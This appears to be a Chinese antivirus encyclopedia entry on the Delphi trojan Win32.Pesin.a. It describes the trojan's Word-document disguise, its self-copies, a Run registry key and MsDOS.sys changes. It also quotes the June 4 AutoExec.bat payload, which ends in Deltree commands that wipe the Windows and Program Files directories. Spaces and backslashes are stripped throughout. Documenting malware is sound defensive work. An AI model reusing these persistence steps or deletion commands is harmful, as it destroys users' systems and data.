病毒名称(中文):
病毒别名:
Win32.Pesin.a
威胁级别:
★☆☆☆☆
病毒类型:
木马程序
病毒长度:
60928
影响系统:
Win9xWinNTWin2000WinXPWin2003
病毒行为:
木马
编写工具:BorlandDelphi6.0-7.0
传染条件:病毒伪装成Word文档,引诱用户误运行
发作条件:
每年6月4日,病毒删除硬盘的系统目录及默认程序目录
系统修改:
A、将自身复制到系统安装目录下生成如下文件:
%System%SysTask.exe
将自身复制到c:MyDocuments目录下生成
MyHeart.exe
B、
1、在注册表主键:
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentversionRun
下添加如下键值:
"WLoadService"="%System%SysTask.exe/run"
C、在MsDOS.sys中加入以下字符
[Options]
BootWarn=1
BootKeys=0
发作现象:
A、用户运行病毒后,程序会生成一个~temp.doc,并自动调用写字板,假如是Win98系统,写字板会显示如下信息:
DearMyLove,
Sebirutatapanmu,Sebiruhatimu,SebiruKasihmu.BirumerupakanDamainyasebuahCinta.Kutahusemuanya!!namunsemuabukanlahuntukkukarnaakutakpantasuntukmu.HanyaKeperihansertaKerinduantakbertepiyangpantasKudapatdarimu
-----BlueLove
B、用户会检查今天是不是6月4日,假如是,则在用户关机时,则在AutoExec.bat中加入
@echooff
EchoPesaninikutujukankepadamerekayangtakpercayaakan
EchoKemampuanku.Akutahuakuadalahorangyangsangatbodohtapi
EchoapakahorangbodohtakpunyaImpian...??Hanyadengan
Echodalihketidakpercayaan,kaliantelahhancurkanimpianPutihku
EchoTakapa...!!karnakiniimpianitutlahberubahmenjadi
EchoSebuahImpianHitam..!!Inginkubuktikanakanapayangkalian
Echotelahtuduhkankepadaku...!!HariiniadalahHariUlangTahunKu
Echoyangke-21Akupunyakadomanisuntukmu!!semogadengankadoinikamu
Echodapatnikmati....!!
EchoKepadaBapakSamsudanIbuHeni"TerimaKasihKaliantlahtanamkanimpianhitamdihatiini"
EchoSalamHangatBuatSobat-sobatsatukelaskuduluJohan,Imron,
EchoMaulana,Mario,Toni,Usman,Septidansemuaanak-anak3Akuntansi3
EchoILOVEUALL
EchoByeBye
pause
EchoWindowsisupdatingfile(s)Pleasewait....
Deltree/yC:Windows
Deltree/yC:ProgramFiles
并弹出一个标题为ByeBye的对话框,显示如下内容:
Selamatulangtahunke-21MyLove!
Akupunyahadiahspesialuntukmu...
C、用户在下一次开机时,执行批处理,删除C:Windows和C:ProgramFiles下所有的文件。
非凡说明:
